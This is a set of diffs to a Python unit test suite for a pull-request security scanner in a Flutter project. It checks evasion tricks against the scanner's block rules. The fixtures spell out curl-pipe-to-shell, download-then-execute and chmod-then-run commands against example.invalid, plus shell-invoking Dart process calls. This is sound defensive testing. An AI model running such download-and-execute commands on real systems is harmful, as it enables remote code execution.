+        for path in ("native/linthra_audio/CMakeLists.txt", "linux/flutter/generated_plugins.cmake"):
+            with self.subTest(path):
+                self.assertSensitive(self.build({}, {path: "# new\n"}))
+
+    def test_documentation_beside_native_code_stays_ordinary(self):
+        self.assertOrdinary(
+            self.build({}, {"native/linthra_core/README.md": "# notes\n"})
+        )
+
+
 class BlockedAdditions(ScannerTestCase):
     def test_direct_process_run(self):
         self.assertBlocked(

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -307,6 +307,25 @@ class SensitiveSurfaces(ScannerTestCase):
         self.assertSensitive(result)
 
 
+class ProjectConfigPaths(ScannerTestCase):
+    """Cross-checked against flutter-ci-fixer.yml's own forbidden-paths list."""
+
+    def test_analyzer_config(self):
+        """`flutter analyze` is a required check on every PR."""
+        path = "analysis_options.yaml"
+        self.assertSensitive(self.build({path: "linter:\n"}, {path: "linter:\n  rules: []\n"}))
+
+    def test_licensing(self):
+        for path in ("LICENSE", "COPYING", "NOTICE.md"):
+            with self.subTest(path):
+                self.assertSensitive(self.build({path: "a\n"}, {path: "b\n"}))
+
+    def test_signing_material(self):
+        for path in ("android/key.properties", "android/app/release.jks", "upload.keystore"):
+            with self.subTest(path):
+                self.assertSensitive(self.build({}, {path: "x\n"}))
+
+
 class GithubDirectoryPaths(ScannerTestCase):
     """`.github/` is automation by default; only community metadata is exempt."""
 
@@ -483,6 +502,50 @@ class BlockedAdditions(ScannerTestCase):
         result = self.build({}, {"lib/a.dart": f"final run = {PROCESS_RUN};\n"})
         self.assertEqual(result.returncode, 1)
         self.assertIn("an approval does not bypass them", result.report)
+
+
+class ProseIsNotLogic(ScannerTestCase):
+    """The credential words are ordinary English."""
+
+    def test_documentation_prose_is_ordinary(self):
+        """The advertised no-ceremony path has to survive the word 'password'."""
+        for path in ("docs/setup.md", "README.md", "docs/faq.txt"):
+            with self.subTest(path):
+                self.assertOrdinary(
+                    self.build({}, {path: "Enter your password to sign in.\n"})
+                )
+
+    def test_code_still_matches(self):
+        self.assertSensitive(
+            self.build({}, {"lib/feature/x.dart": "final password = read();\n"})
+        )
+
+
+class DownloadMadeExecutable(ScannerTestCase):
+    """chmod is a supply-chain event, but it is not itself execution."""
+
+    URL = "https://example.invalid/tool"
+
+    def test_chmod_without_execution_is_reviewable_not_blocked(self):
+        script = f"#!/bin/sh\ncurl -o /tmp/tool {self.URL} && chmod +x /tmp/tool\n"
+        result = self.build({}, {"packaging/install.sh": script})
+        self.assertFalse(result.blocked, result.report)
+        self.assertTrue(result.sensitive, result.report)
+
+    def test_chmod_then_invocation_is_blocked(self):
+        script = blocked(
+            f"#!/bin/sh\ncurl -o /tmp/tool {self.URL} && chmod +x /tmp/tool\n", "/tmp/tool", "\n"
+        )
+        self.assertBlocked(self.build({}, {"packaging/run.sh": script}))
+
+    def test_path_reappearing_at_line_start_is_not_an_invocation(self):
+        """Without the chmod, a path at line start is just a path."""
+        script = (
+            "#!/bin/sh\n"
+            f"curl -o /tmp/tool {self.URL} && echo done\n"
+            "# /tmp/tool is where it landed\n"
+        )
+        self.assertOrdinary(self.build({}, {"packaging/note.sh": script}))
 
 
 class ShellFlagValues(ScannerTestCase):
@@ -1282,8 +1345,7 @@ class GuardSelfSafety(unittest.TestCase):
 
     def test_every_blocked_rule_matches_its_own_reason_free_fixture(self):
         """Guards against a fragment split that quietly breaks a rule."""
-        matched = set()
-        for fixture in (
+        fixtures = (
             f"{PROCESS_RUN}('sh', [])",
             f"{PROCESS_START}('sh')",
             f"'{RUN_IN_SHELL}': true",
@@ -1293,11 +1355,20 @@ class GuardSelfSafety(unittest.TestCase):
             WRITE_ALL,
             blocked("curl -s https://example.invalid ", "|", " bash"),
             blocked("curl -s https://example.invalid -o /tmp/x && ", "sh", " /tmp/x"),
-        ):
-            for pattern, reason in scanner.BLOCKED_ADDITION_RULES:
-                if pattern.search(fixture):
-                    matched.add(reason)
-        self.assertEqual(len(matched), len(scanner.BLOCKED_ADDITION_RULES))
+            blocked(
+                "curl -s https://example.invalid -o /tmp/x && chmod +x /tmp/x\n",
+                "/tmp/x",
+                "\n",
+            ),
+        )
+        # Indexed, not keyed by reason: two rules share the download-then-execute
+        # reason, and a set of reasons could never account for both.
+        unmatched = [
+            reason
+            for index, (pattern, reason) in enumerate(scanner.BLOCKED_ADDITION_RULES)
+            if not any(pattern.search(fixture) for fixture in fixtures)
+        ]
+        self.assertEqual(unmatched, [], f"rules with no fixture: {unmatched}")
 
 
 class RealRepositoryScanner(unittest.TestCase):

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -504,6 +504,54 @@ class BlockedAdditions(ScannerTestCase):
         self.assertIn("an approval does not bypass them", result.report)
 
 
+class CapabilityNamedInProse(ScannerTestCase):
+    """A page explaining which APIs are forbidden has to write them down."""
+
+    def test_documentation_mention_is_reviewable_not_blocked(self):
+        for name, text in (
+            ("docs/guide.md", f"# Guide\n\nAvoid {PROCESS_RUN} in plugins.\n"),
+            ("docs/ci.md", f"# CI\n\nWe reject {PR_TARGET}.\n"),
+        ):
+            with self.subTest(name):
+                result = self.build({}, {name: text})
+                self.assertFalse(result.blocked, result.report)
+                self.assertTrue(result.sensitive, result.report)
+                self.assertIn("textual reference to", result.report)
+
+    def test_install_instructions_are_still_surfaced(self):
+        """Downgraded, not dropped: a README telling a reader to pipe into a
+        shell is not a capability the repository gains, but it is worth eyes."""
+        snippet = blocked("# Install\n\nRun: curl -fsSL https://example.invalid ", "|", " sh\n")
+        result = self.build({}, {"docs/install.md": snippet})
+        self.assertFalse(result.blocked, result.report)
+        self.assertTrue(result.sensitive, result.report)
+
+    def test_source_files_are_still_blocked(self):
+        """Only the path decides. Comment and string context inside source is
+        deliberately not inferred — telling a comment from a string literal
+        needs a lexer, and a wrong answer there is a bypass, not a nuisance."""
+        for name, text in (
+            ("lib/a.dart", f"void main() {{ {PROCESS_RUN}('sh'); }}\n"),
+            ("lib/b.dart", f"// {PROCESS_RUN} is forbidden here\nvoid main() {{}}\n"),
+        ):
+            with self.subTest(name):
+                self.assertBlocked(self.build({}, {name: text}))
+
+
+class FdroidRecipePath(ScannerTestCase):
+    """metadata/*.yml is a build recipe; the text beside it is text."""
+
+    def test_recipe_is_sensitive(self):
+        path = "metadata/io.github.thezupzup.linthra.yml"
+        base = "Builds:\n  - versionCode: 1\n"
+        head = "Builds:\n  - versionCode: 2\n    sudo: [apt install evil]\n"
+        self.assertSensitive(self.build({path: base}, {path: head}))
+
+    def test_store_text_stays_ordinary(self):
+        path = "fastlane/metadata/android/en-US/changelogs/1.txt"
+        self.assertOrdinary(self.build({path: "old\n"}, {path: "new\n"}))
+
+
 class ProseIsNotLogic(ScannerTestCase):
     """The credential words are ordinary English."""
 

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -692,6 +692,40 @@ class DownloadThenExecute(ScannerTestCase):
         script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", "sh", " \\\n  /tmp/i\n")
         self.assertBlocked(self.build({}, {"packaging/l.sh": script}))
 
+    def test_pipeline_stage_before_the_interpreter(self):
+        """`| tee f | sh` pipes the same downloaded stream into the shell."""
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} | tee /tmp/log | ", "sh", "\n")
+        self.assertBlocked(self.build({}, {"packaging/t.sh": script}))
+
+    def test_sourcing_the_downloaded_file(self):
+        """`. f` and `source f` run it in the current shell."""
+        for name, spelling in (("packaging/s1.sh", "."), ("packaging/s2.sh", "source")):
+            with self.subTest(spelling):
+                script = blocked(
+                    f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", spelling, " /tmp/i\n"
+                )
+                self.assertBlocked(self.build({}, {name: script}))
+
+    def test_redirect_belonging_to_a_later_command_is_not_blocked(self):
+        """The curl never writes /tmp/i; printf does, after a `;`."""
+        script = (
+            "#!/bin/sh\n"
+            f"curl {self.URL}; printf 'echo ok' > /tmp/i; sh /tmp/i\n"
+        )
+        self.assertOrdinary(self.build({}, {"packaging/r.sh": script}))
+
+    def test_logical_or_is_not_a_pipeline(self):
+        script = f"#!/bin/sh\ncurl -fsSL {self.URL}/probe || sh ./fallback.sh\n"
+        self.assertOrdinary(self.build({}, {"packaging/o.sh": script}))
+
+    def test_dot_as_an_argument_is_not_sourcing(self):
+        """`jq . file` passes a dot; it does not source anything."""
+        script = (
+            "#!/bin/sh\n"
+            f"curl -s {self.URL} -o /tmp/d.json && jq . /tmp/d.json\n"
+        )
+        self.assertOrdinary(self.build({}, {"packaging/j.sh": script}))
+
     def test_executed_file_only_sharing_a_prefix_is_not_blocked(self):
         """`/tmp/data` and `/tmp/data-cleanup.sh` are different files."""
         script = (
@@ -1090,7 +1124,22 @@ class SensitiveActivation(ScannerTestCase):
         head = "class P {\n  final c = HttpClient();\n}\n"
         result = self.build({"lib/ui/panel.dart": base}, {"lib/ui/panel.dart": head})
         self.assertSensitive(result)
-        self.assertIn("deletion may activate existing", result.report)
+        self.assertIn("removed suppression may activate existing", result.report)
+
+    def test_delimiters_replaced_by_blank_lines(self):
+        """Loses no lines, so a net-count signal would miss it."""
+        base = "class P {\n/*\n  final c = HttpClient();\n*/\n}\n"
+        head = "class P {\n\n  final c = HttpClient();\n\n}\n"
+        self.assertSensitive(
+            self.build({"lib/ui/panel.dart": base}, {"lib/ui/panel.dart": head})
+        )
+
+    def test_removing_an_if_false_guard(self):
+        base = "class P {\n  void g() {\n    if (false) {\n      final c = HttpClient();\n    }\n  }\n}\n"
+        head = "class P {\n  void g() {\n      final c = HttpClient();\n  }\n}\n"
+        self.assertSensitive(
+            self.build({"lib/ui/panel.dart": base}, {"lib/ui/panel.dart": head})
+        )
 
     def test_editing_beside_sensitive_code_stays_ordinary(self):
         """The load-bearing case: 356 files hold a sensitive match.
@@ -1100,6 +1149,12 @@ class SensitiveActivation(ScannerTestCase):
         """
         base = "class W {\n  final c = HttpClient();\n}\n// tail\n"
         head = "class W {\n  final c = HttpClient();\n}\n// tail edited\n"
+        self.assertOrdinary(self.build({"lib/ui/w.dart": base}, {"lib/ui/w.dart": head}))
+
+    def test_deleting_ordinary_lines_beside_sensitive_code_stays_ordinary(self):
+        """Removing plain code is not removing a suppression."""
+        base = "class W {\n  final c = HttpClient();\n}\n// a\n// b\n"
+        head = "class W {\n  final c = HttpClient();\n}\n"
         self.assertOrdinary(self.build({"lib/ui/w.dart": base}, {"lib/ui/w.dart": head}))
 
 

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -504,6 +504,14 @@ class DownloadThenExecute(ScannerTestCase):
         )
         self.assertOrdinary(self.build({}, {"tools/i.sh": script}))
 
+    def test_quoted_execution_target(self):
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", "sh", ' "/tmp/i"\n')
+        self.assertBlocked(self.build({}, {"tools/qa.sh": script}))
+
+    def test_quoted_download_target_unquoted_execution(self):
+        script = blocked(f'#!/bin/sh\ncurl -fsSL {self.URL} -o "/tmp/i" && ', "sh", " /tmp/i\n")
+        self.assertBlocked(self.build({}, {"tools/qb.sh": script}))
+
     def test_downloading_data_and_running_an_unrelated_script_is_not_blocked(self):
         """The backreference is what keeps this rule from over-matching."""
         script = (
@@ -514,21 +522,52 @@ class DownloadThenExecute(ScannerTestCase):
         self.assertOrdinary(self.build({}, {"tools/f.sh": script}))
 
 
-class ContinuationFolding(unittest.TestCase):
-    def test_backslash_continuation_is_folded(self):
-        self.assertEqual(scanner.fold_continuations("a \\\n  b"), "a  b")
+class AddedLineMapping(unittest.TestCase):
+    """A match counts only when it overlaps a line the PR added."""
 
-    def test_trailing_pipe_is_folded(self):
-        self.assertEqual(scanner.fold_continuations("a |\n  b"), "a | b")
+    def test_match_inside_an_added_line(self):
+        offsets = scanner._line_index("a\nb\nc\n")
+        self.assertTrue(scanner.touches_added_lines(offsets, frozenset({2}), 2, 3))
 
-    def test_ordinary_newlines_are_preserved(self):
-        self.assertEqual(scanner.fold_continuations("a\nb"), "a\nb")
+    def test_match_entirely_inside_untouched_lines(self):
+        offsets = scanner._line_index("a\nb\nc\n")
+        self.assertFalse(scanner.touches_added_lines(offsets, frozenset({2}), 0, 1))
 
-    def test_additions_are_grouped_per_file_in_order(self):
-        grouped = scanner.group_additions(
-            [("lib/a.dart", "one"), ("lib/b.dart", "x"), ("lib/a.dart", "two")]
+    def test_match_spanning_context_into_an_added_line(self):
+        """The finding-E shape: receiver on an old line, member on a new one."""
+        text = "final e = Process\n  .run;\n"
+        offsets = scanner._line_index(text)
+        rule = scanner.BLOCKED_ADDITION_RULES[0][0]
+        match = rule.search(text)
+        self.assertIsNotNone(match)
+        self.assertTrue(
+            scanner.touches_added_lines(offsets, frozenset({2}), match.start(), match.end())
         )
-        self.assertEqual(grouped, [("lib/a.dart", "one\ntwo"), ("lib/b.dart", "x")])
+        self.assertFalse(
+            scanner.touches_added_lines(offsets, frozenset({9}), match.start(), match.end())
+        )
+
+
+class ConstructCompletedFromContext(ScannerTestCase):
+    """A PR can finish a blocked construct using tokens already in the file."""
+
+    def test_added_fragment_completes_an_existing_receiver(self):
+        base = "class R {\n  static final execute = " + PROCESS_RUN[:7] + "\n  ;\n}\n"
+        head = "class R {\n  static final execute = " + PROCESS_RUN[:7] + "\n  ." + PROCESS_RUN[8:] + ";\n}\n"
+        result = self.build({"lib/r.dart": base}, {"lib/r.dart": head})
+        self.assertBlocked(result)
+        self.assertIn("lib/r.dart", result.reported_paths())
+
+    def test_grandfathered_construct_on_an_untouched_line_is_not_reported(self):
+        """Editing elsewhere in a file that already contains a blocked call."""
+        base = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail\n"
+        head = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n// tail edited\n"
+        self.assertOrdinary(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
+
+    def test_touching_the_grandfathered_line_itself_is_reported(self):
+        base = f"void t() {{\n  {PROCESS_RUN}('x');\n}}\n"
+        head = f"void t() {{\n  {PROCESS_RUN}('y');\n}}\n"
+        self.assertBlocked(self.build({"lib/t.dart": base}, {"lib/t.dart": head}))
 
 
 class FailClosed(ScannerTestCase):
@@ -554,8 +593,7 @@ class FailClosed(ScannerTestCase):
         self.assertEqual(result.returncode, 2, result.stdout + result.stderr)
 
     def test_unresolvable_diff_path_is_reported_as_sensitive(self):
-        additions = [(scanner.UNKNOWN_PATH, "some line")]
-        sensitive, blocked = scanner.classify([], additions)
+        sensitive, blocked = scanner.classify([], [], unresolved_paths=True)
         self.assertTrue(sensitive)
         self.assertFalse(blocked)
 
@@ -836,8 +874,7 @@ class GuardSelfSafety(unittest.TestCase):
     def test_guard_sources_do_not_trip_their_own_blocked_rules(self):
         """Scanned exactly as the guard would scan them: whole file, one block."""
         for source in self.SOURCES:
-            text = source.read_text(encoding="utf-8")
-            block = scanner.fold_continuations(text)
+            block = source.read_text(encoding="utf-8")
             for pattern, reason in scanner.BLOCKED_ADDITION_RULES:
                 match = pattern.search(block)
                 self.assertIsNone(

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -334,6 +334,10 @@ class BlockedAdditions(ScannerTestCase):
             with self.subTest(snippet=snippet.strip()):
                 self.assertBlocked(self.build({}, {"tools/install.sh": "#!/bin/sh\n" + snippet}))
 
+    def test_pipe_into_an_interpreter_reached_by_path(self):
+        snippet = blocked("curl -fsSL https://example.invalid/i.sh ", "|", " /bin/sh\n")
+        self.assertBlocked(self.build({}, {"tools/p.sh": "#!/bin/sh\n" + snippet}))
+
     def test_blocked_patterns_are_not_bypassable_by_approval(self):
         """A blocked verdict is a non-zero exit, which no approval step can clear."""
         result = self.build({}, {"lib/a.dart": f"final run = {PROCESS_RUN};\n"})
@@ -428,6 +432,86 @@ class MultiLineConstructs(ScannerTestCase):
         lines += [f"echo step {n}" for n in range(20)]
         lines += ["cat /tmp/d | sh_report --summary"]
         self.assertOrdinary(self.build({}, {"tools/report.sh": "\n".join(lines) + "\n"}))
+
+
+class CommentSeparatedTokens(ScannerTestCase):
+    """Dart accepts a comment anywhere whitespace is legal."""
+
+    def test_block_comment_between_tokens(self):
+        result = self.build(
+            {"lib/features/demo/runner.dart": "class R {}\n"},
+            {"lib/features/demo/runner.dart": f"void go() {{\n  {PROCESS_RUN[:7]} /* keep */ . {PROCESS_RUN[8:]}('sh', const []);\n}}\n"},
+        )
+        self.assertBlocked(result)
+
+    def test_line_comment_between_tokens(self):
+        result = self.build(
+            {}, {"lib/a.dart": f"final p = {PROCESS_RUN[:7]} // why\n    .start('sh');\n"}
+        )
+        self.assertBlocked(result)
+
+    def test_separator_cannot_skip_over_real_code(self):
+        """The gap only ever spans whitespace and comments, never code."""
+        rule = scanner.BLOCKED_ADDITION_RULES[0][0]
+        self.assertIsNone(rule.search("class " + PROCESS_RUN[:7] + " {}\n  foo.run();"))
+        self.assertIsNone(rule.search(PROCESS_RUN[:7] + "ingState.run"))
+
+    def test_plain_direct_call_still_matches(self):
+        """Regression: the separator must not break the ordinary spelling."""
+        rule = scanner.BLOCKED_ADDITION_RULES[0][0]
+        self.assertIsNotNone(rule.search(f"{PROCESS_RUN}('sh', [])"))
+
+
+class DownloadThenExecute(ScannerTestCase):
+    """Fetching to a file and running it later is the same capability."""
+
+    URL = "https://example.invalid/i"
+
+    def test_and_chained_on_one_line(self):
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", "sh", " /tmp/i\n")
+        self.assertBlocked(self.build({}, {"tools/a.sh": script}))
+
+    def test_split_across_lines(self):
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/j\n", "bash", " /tmp/j\n")
+        self.assertBlocked(self.build({}, {"tools/b.sh": script}))
+
+    def test_wget_output_flag(self):
+        script = blocked(f"#!/bin/sh\nwget -O /tmp/k {self.URL}\n", "bash", " /tmp/k\n")
+        self.assertBlocked(self.build({}, {"tools/c.sh": script}))
+
+    def test_shell_redirect_to_file(self):
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} > /tmp/m; ", "python3", " /tmp/m\n")
+        self.assertBlocked(self.build({}, {"tools/d.sh": script}))
+
+    def test_chmod_then_direct_execution(self):
+        script = f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/n\nchmod +x /tmp/n\n/tmp/n\n"
+        self.assertBlocked(self.build({}, {"tools/e.sh": script}))
+
+    def test_interpreter_reached_by_path(self):
+        """`/bin/sh` is an interpreter; `report.sh` is a filename."""
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/p && /bin/", "bash", " /tmp/p\n")
+        self.assertBlocked(self.build({}, {"tools/g.sh": script}))
+
+    def test_sudo_interpreter(self):
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/q && sudo ", "sh", " /tmp/q\n")
+        self.assertBlocked(self.build({}, {"tools/h.sh": script}))
+
+    def test_downloaded_file_consumed_by_a_non_interpreter_is_not_blocked(self):
+        script = (
+            "#!/bin/sh\n"
+            f"curl -fsSL {self.URL}/d.json -o /tmp/d.json\n"
+            "jq . /tmp/d.json\n"
+        )
+        self.assertOrdinary(self.build({}, {"tools/i.sh": script}))
+
+    def test_downloading_data_and_running_an_unrelated_script_is_not_blocked(self):
+        """The backreference is what keeps this rule from over-matching."""
+        script = (
+            "#!/bin/sh\n"
+            f"curl -fsSL {self.URL}/catalog.json -o /tmp/catalog.json\n"
+            "bash ./scripts/process_catalog.sh /tmp/catalog.json\n"
+        )
+        self.assertOrdinary(self.build({}, {"tools/f.sh": script}))
 
 
 class ContinuationFolding(unittest.TestCase):
@@ -784,6 +868,7 @@ class GuardSelfSafety(unittest.TestCase):
             f"on: [{PR_TARGET}]",
             WRITE_ALL,
             blocked("curl -s https://example.invalid ", "|", " bash"),
+            blocked("curl -s https://example.invalid -o /tmp/x && ", "sh", " /tmp/x"),
         ):
             for pattern, reason in scanner.BLOCKED_ADDITION_RULES:
                 if pattern.search(fixture):

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -1,0 +1,741 @@
+#!/usr/bin/env python3
+"""Unit tests for the PR security surface guard.
+
+    python3 test/tooling/check_pr_security_surface_test.py
+
+Two things are under test:
+
+* `scripts/check_pr_security_surface.py`, exercised end to end against synthetic
+  git repositories. A classifier is only worth its blocked list if it still sees
+  the diff when a contributor tries to hide it, so most of these tests take a
+  benign change, apply exactly one evasion trick to it, and expect the same
+  verdict as without the trick.
+* the parts of `.github/workflows/pr-security-review.yml` that carry security
+  logic: the trusted-scanner loader and the jq filter that decides whether the
+  current HEAD is approved. Both are read out of the workflow file itself and
+  executed here, so the tests cannot drift away from what CI runs.
+
+Everything is offline. No network, no GitHub API, no repository writes.
+"""
+
+from __future__ import annotations
+
+import importlib.util
+import json
+import os
+import shutil
+import subprocess
+import sys
+import tempfile
+import unittest
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[2]
+SCANNER = ROOT / "scripts" / "check_pr_security_surface.py"
+WORKFLOW = ROOT / ".github" / "workflows" / "pr-security-review.yml"
+
+
+def _load(name: str, path: Path):
+    spec = importlib.util.spec_from_file_location(name, path)
+    assert spec is not None and spec.loader is not None
+    module = importlib.util.module_from_spec(spec)
+    sys.modules[name] = module
+    spec.loader.exec_module(module)
+    return module
+
+
+scanner = _load("check_pr_security_surface", SCANNER)
+
+
+def blocked(*fragments: str) -> str:
+    """Assemble a fixture containing a literal the guard blocks.
+
+    The guard scans every added line of every changed file, this test file
+    included. A fixture that spelled these patterns out contiguously would make
+    the guard reject any PR that touches its own tests, so they are joined at
+    runtime instead. `GuardSelfSafety` proves the split is complete.
+    """
+
+    return "".join(fragments)
+
+
+PROCESS_RUN = blocked("Process", ".", "run")
+PROCESS_START = blocked("Process", " . ", "start")
+RUN_IN_SHELL = blocked("runIn", "Shell")
+DART_FFI = "dart:" + blocked("f", "fi")
+DYNAMIC_LIBRARY = blocked("Dynamic", "Library")
+PR_TARGET = blocked("pull_request", "_target")
+WRITE_ALL = blocked("permissions: ", "write-all")
+
+
+class ScanResult:
+    def __init__(self, returncode: int, stdout: str, stderr: str, report: str, outputs: dict[str, str]):
+        self.returncode = returncode
+        self.stdout = stdout
+        self.stderr = stderr
+        self.report = report
+        self.outputs = outputs
+
+    @property
+    def sensitive(self) -> bool:
+        return self.outputs.get("sensitive") == "true"
+
+    @property
+    def blocked(self) -> bool:
+        return self.outputs.get("blocked") == "true"
+
+    def reported_paths(self) -> set[str]:
+        paths = set()
+        for line in self.report.splitlines():
+            if line.startswith("- `"):
+                paths.add(line[3 : line.index("`", 3)])
+        return paths
+
+
+def _git(repo: Path, *args: str) -> str:
+    result = subprocess.run(
+        ["git", *args],
+        cwd=repo,
+        check=True,
+        text=True,
+        stdout=subprocess.PIPE,
+        stderr=subprocess.PIPE,
+        env={**os.environ, "GIT_CONFIG_GLOBAL": os.devnull, "GIT_CONFIG_SYSTEM": os.devnull},
+    )
+    return result.stdout
+
+
+def _write(repo: Path, relative: str, content: str) -> None:
+    target = repo / relative
+    target.parent.mkdir(parents=True, exist_ok=True)
+    target.write_text(content, encoding="utf-8")
+
+
+def _commit(repo: Path, message: str) -> str:
+    _git(repo, "add", "-A")
+    _git(repo, "commit", "-q", "--allow-empty", "-m", message)
+    return _git(repo, "rev-parse", "HEAD").strip()
+
+
+class ScannerTestCase(unittest.TestCase):
+    """Base class that builds a throwaway two-commit repository per scenario."""
+
+    def build(self, base: dict[str, str], head: dict[str, str | None]) -> ScanResult:
+        tmp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, tmp, True)
+        repo = tmp / "repo"
+        repo.mkdir()
+
+        _git(repo, "init", "-q", "-b", "main", ".")
+        _git(repo, "config", "user.email", "test@example.invalid")
+        _git(repo, "config", "user.name", "Test")
+
+        _write(repo, "README.md", "# fixture\n")
+        for path, content in base.items():
+            _write(repo, path, content)
+        base_sha = _commit(repo, "base")
+
+        for path, content in head.items():
+            if content is None:
+                (repo / path).unlink()
+            else:
+                _write(repo, path, content)
+        head_sha = _commit(repo, "head")
+
+        return self.scan(repo, base_sha, head_sha)
+
+    def scan(self, repo: Path, base_sha: str, head_sha: str) -> ScanResult:
+        tmp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, tmp, True)
+        report = tmp / "report.md"
+        output = tmp / "github_output"
+        output.touch()
+
+        result = subprocess.run(
+            [
+                sys.executable,
+                str(SCANNER),
+                "--base",
+                base_sha,
+                "--head",
+                head_sha,
+                "--report",
+                str(report),
+                "--github-output",
+                str(output),
+            ],
+            cwd=repo,
+            text=True,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+        )
+
+        outputs: dict[str, str] = {}
+        for line in output.read_text(encoding="utf-8").splitlines():
+            if "=" in line:
+                key, _, value = line.partition("=")
+                outputs[key] = value
+
+        return ScanResult(
+            result.returncode,
+            result.stdout,
+            result.stderr,
+            report.read_text(encoding="utf-8") if report.exists() else "",
+            outputs,
+        )
+
+    def assertOrdinary(self, result: ScanResult) -> None:
+        self.assertEqual(result.returncode, 0, result.stdout + result.stderr)
+        self.assertFalse(result.sensitive, result.report)
+        self.assertFalse(result.blocked, result.report)
+
+    def assertSensitive(self, result: ScanResult) -> None:
+        self.assertEqual(result.returncode, 0, result.stdout + result.stderr)
+        self.assertTrue(result.sensitive, result.report)
+        self.assertFalse(result.blocked, result.report)
+
+    def assertBlocked(self, result: ScanResult) -> None:
+        self.assertEqual(result.returncode, 1, result.stdout + result.stderr)
+        self.assertTrue(result.blocked, result.report)
+
+
+class OrdinaryDiffs(ScannerTestCase):
+    def test_ui_only_pr_needs_no_ceremony(self):
+        result = self.build(
+            {"lib/ui/player_button.dart": "class PlayerButton {}\n"},
+            {
+                "lib/ui/player_button.dart": "class PlayerButton {\n  final double size = 48;\n}\n",
+                "test/ui/player_button_test.dart": "void main() {}\n",
+                "docs/ui.md": "# UI\n\nThe player button is 48dp.\n",
+            },
+        )
+        self.assertOrdinary(result)
+
+    def test_binary_asset_is_not_sensitive(self):
+        tmp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, tmp, True)
+        repo = tmp / "repo"
+        repo.mkdir()
+        _git(repo, "init", "-q", "-b", "main", ".")
+        _git(repo, "config", "user.email", "test@example.invalid")
+        _git(repo, "config", "user.name", "Test")
+        _write(repo, "README.md", "# fixture\n")
+        base_sha = _commit(repo, "base")
+        (repo / "assets").mkdir()
+        (repo / "assets" / "icon.png").write_bytes(bytes(range(256)) * 64)
+        head_sha = _commit(repo, "head")
+        self.assertOrdinary(self.scan(repo, base_sha, head_sha))
+
+
+class SensitiveSurfaces(ScannerTestCase):
+    def test_network_and_auth_change(self):
+        result = self.build(
+            {"lib/data/network_client.dart": "class NetworkClient {}\n"},
+            {"lib/data/network_client.dart": "class NetworkClient {\n  final client = HttpClient();\n}\n"},
+        )
+        self.assertSensitive(result)
+        self.assertIn("lib/data/network_client.dart", result.reported_paths())
+
+    def test_persistence_and_filesystem_change(self):
+        result = self.build(
+            {"lib/ui/exporter.dart": "class Exporter {}\n"},
+            {"lib/ui/exporter.dart": "void save() {\n  File('/tmp/out').writeAsString('x');\n}\n"},
+        )
+        self.assertSensitive(result)
+
+    def test_workflow_change(self):
+        result = self.build(
+            {".github/workflows/ci.yml": "name: ci\non: [push]\n"},
+            {".github/workflows/ci.yml": "name: ci\non: [push, pull_request]\n"},
+        )
+        self.assertSensitive(result)
+
+    def test_deleting_an_automation_script_is_sensitive(self):
+        result = self.build(
+            {"scripts/check_secrets.sh": "#!/bin/sh\necho scan\n"},
+            {"scripts/check_secrets.sh": None},
+        )
+        self.assertSensitive(result)
+        self.assertIn("scripts/check_secrets.sh", result.reported_paths())
+
+    def test_rename_out_of_scripts_still_reports_the_original_path(self):
+        """Rename detection would otherwise show only the harmless destination."""
+        body = "#!/bin/sh\n" + "".join(f"echo line {n}\n" for n in range(40))
+        result = self.build(
+            {"scripts/tool.sh": body},
+            {"scripts/tool.sh": None, "docs/tool.sh": body},
+        )
+        self.assertSensitive(result)
+        self.assertIn("scripts/tool.sh", result.reported_paths())
+
+    def test_gitattributes_change_is_sensitive(self):
+        result = self.build({}, {".gitattributes": "*.dart text\n"})
+        self.assertSensitive(result)
+
+
+class BlockedAdditions(ScannerTestCase):
+    def test_direct_process_run(self):
+        self.assertBlocked(
+            self.build(
+                {"lib/ui/panel.dart": "class Panel {}\n"},
+                {"lib/ui/panel.dart": f"void go() {{\n  {PROCESS_RUN}('sh', ['-c', 'id']);\n}}\n"},
+            )
+        )
+
+    def test_indirect_process_run_reference(self):
+        """Binding the API to a local grants the same capability as calling it."""
+        result = self.build(
+            {"lib/features/demo/runner.dart": "class Runner {}\n"},
+            {
+                "lib/features/demo/runner.dart": (
+                    f"final run = {PROCESS_RUN};\n"
+                    "Future<void> go(List<String> args) async {\n"
+                    "  await run('sh', args);\n"
+                    "}\n"
+                )
+            },
+        )
+        self.assertBlocked(result)
+        self.assertIn("runtime process execution", result.report)
+
+    def test_process_start_and_run_in_shell(self):
+        self.assertBlocked(
+            self.build({}, {"lib/a.dart": f"final p = {PROCESS_START};\n"})
+        )
+        self.assertBlocked(
+            self.build({}, {"lib/a.dart": f"final opts = {{'{RUN_IN_SHELL}': shellFlag}};\n"})
+        )
+
+    def test_ffi_and_dynamic_library(self):
+        self.assertBlocked(self.build({}, {"lib/a.dart": f"import '{DART_FFI}' as ffi;\n"}))
